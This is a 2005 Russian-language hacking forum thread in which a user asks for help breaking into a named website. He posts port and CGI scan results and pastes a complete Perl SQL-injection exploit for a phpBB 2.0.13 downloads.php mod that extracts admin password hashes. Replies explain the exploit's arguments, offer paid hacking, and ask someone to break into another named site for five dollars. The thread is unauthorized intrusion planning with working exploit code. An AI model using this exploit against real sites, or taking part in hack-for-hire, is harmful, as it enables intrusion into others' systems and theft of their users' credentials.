ПОмагите взломать саййт
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя |
Сообщение |
<< Старые топики Новые топики >> |
|
|
ПОмагите взломать саййт - 2005-06-10 11:38:59
|
|
|
Folk_91
Сообщений: 52
Оценки: 0
Присоединился: 2005-05-28 21:57:03
|
сайт который я хочу пвзломать www.pcnuke.com Я просканировал открытые порты {сканировал я nscan} открытые порты : 80 53 26 25 22 21 Телнетюсь к 22 порту версяя демона : SHH-1.99-OpenSHH_3.6.1p2 Затем просканировал сайт на наличие cgi шибок {сканировал DCS 2.1} он показал : что насервере стоит Apache/1.3.33 {Unix}mod_python/2.7.10 Plython/2.3.3 mod_auth_passthroug
атиперь сами уязвимости
www.pсnuke.com/~root - 403 www.pсnuke.com/cgi-bin/ - 403 www.pсnuke.com/cgi-bin/WindMail.exe?%20-n%20c:\boot.ini% - 500 www.pсnuke.com/?wp-cs-dump - [200 success] www.pсnuke.com/?PageServices - [200 success] www.pсnuke.com/config/html/cnf_gi.htm - [200 success] www.pcnuke.com/.html/…………./config.sys - 403
Ещё там форум есть и его версия phpBB 2.0.13
А что дальше делать незнаю ведь это мой первый взлом
Эксплойт для версии форума : Цель эксплоита: phpBB 2.0.13 и более ранние версии Воздействие эксплоита: Получение хеша паролей
#!/usr/bin/perl -w use IO::Socket;
## Example: ## C:\>phpbb.pl www.site.com /phpBB2/ 2 ## ## downloads.php mod in phpBB <= 2.0.13 ## ********************************** ## [~] Connecting… ## [+] Connected! ## [~] Sending Data… ## [~] Data Sent, Waiting for response… ## [+] MD5 Hash for user with id=2 is: 81dc9bdb52d04dc20036dbd8313ed055 ## if (@ARGV < 3) { print "\n\n"; print "|****************************************************************|\n"; print " phpBB <=2.0.13 ''downloads.php'' Mod\n"; print " Bug found by Axl And CereBrums\n"; print " Coded by CereBrums // 2/4/2005\n"; print " Usage: phpbb.pl <site> <folder> <user_id>\n"; print " e.g.: phpbb.pl www.site.com /phpBB2/ 2 \n"; print " [~] <server> - site address\n"; print " [~] <folder> - forum folder\n"; print " [~] <user_id> - user id (2 default for phpBB admin)\n"; print "|****************************************************************|\n"; print "\n\n"; exit(1); }
$take = 0; $success = 0; $server = $ARGV[0]; $folder = $ARGV[1]; $user_id = $ARGV[2]; print "\n downloads.php mod in phpBB <= 2.0.13\n"; print " **********************************\n"; print " [~] Connecting…\n"; $socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80") || die "$socket error $!";
print " [+] Connected\n"; print " [~] Sending Data…\n";
$path = "http://$server/"; $path .= "/$folder/"; $path .= "downloads.php?cat=-1%20UNION%20SELECT%200,user_password,0,0,0,0,0,0,0%20FROM%20phpbb_users%20WHERE%20user_id=$user_id/*"; print $socket "GET $path HTTP/1.0\r\n\r\n";
print " [~] Data Sent, Waiting for response…\n";
while ($answer = <$socket>) { if ($take == 1) { $pass = substr($answer,51,32); print " [+] MD5 Hash for user with id=$user_id is: $pass\n"; $success = 1; $take = 0; } $found = rindex ($answer,"downloads.php?view=detail&id=0&cat=0"); if ( $found > -1 ) { $take = 1; } } if ($success==0) {print " [-] Exploit failed\n";}
## EOF ## # milw0rm.com [2005-04-02]
Но вот вчём проблема как его использовать я незнаю [sm=9.gif][sm=9.gif][sm=9.gif] -Хесть свой собственный шелл а как его там скомпить я не знаю А что дальше делать незнаю ведь это мой первый взлом
-{ПОЖАЙЛУСТА ПОМОГИТЕ ПОЛУЧИТЬ ХОТЬ NOBODY ПРАВА -{и если не затруднит попадробнее
-{заранее спасибо
ISQ 335218444 e-mail Folk_91@mail.ru
|
|
|
ПОмагите взломать саййт - 2005-06-10 11:56:58
|
|
|
deZZineSS
Сообщений: 73
Оценки: 0
Присоединился: 2004-08-24 21:32:20
|
## Example:<BR>## C:\>phpbb.pl www.site.com /phpBB2/ 2(Где 2 - id юзера, чей хеш ты хочешь утащить)<BR>##<BR>## downloads.php mod in phpBB <= 2.0.13
Надо смотреть внимательнее. Причем этот сплоит действует при наличии установленного модуля downloads.php.
|
|
|
ПОмагите взломать саййт - 2005-06-10 12:30:21
|
|
|
Sandro [Anthology_Murderer$]
Сообщений: 5
Оценки: 0
Присоединился: 2005-06-09 17:32:07
|
Эх Folk_91 гений науки!!![sm=001.gif] http://www.pcnuke.com/ - у меня ваше не грузит! Я могу тебе за деньги ломануть… если хочеш… пиши на мыло.
|
|
|
ПОмагите взломать саййт - 2005-06-10 12:47:13
|
|
|
Folk_91
Сообщений: 52
Оценки: 0
Присоединился: 2005-05-28 21:57:03
|
Да,нет я сам хочу этот сайт ломануть
|
|
|
ПОмагите взломать саййт - 2005-06-10 13:57:04
|
|
|
virk2000
Сообщений: 2
Оценки: 0
Присоединился: 2005-06-10 13:39:23
|
А ради справедливости не поможешь??? Просто максимум что могу заплатить так это 5 баксов…:( адрес http://design.dn.ua …
|
|
|
ПОмагите взломать саййт - 2005-06-11 19:37:37
|
|
|
[rapt0r]
Сообщений: 105
Оценки: 0
Присоединился: 2005-03-10 20:13:31
|
ну может и поможем, стучись в асю…
|
|
|
|
|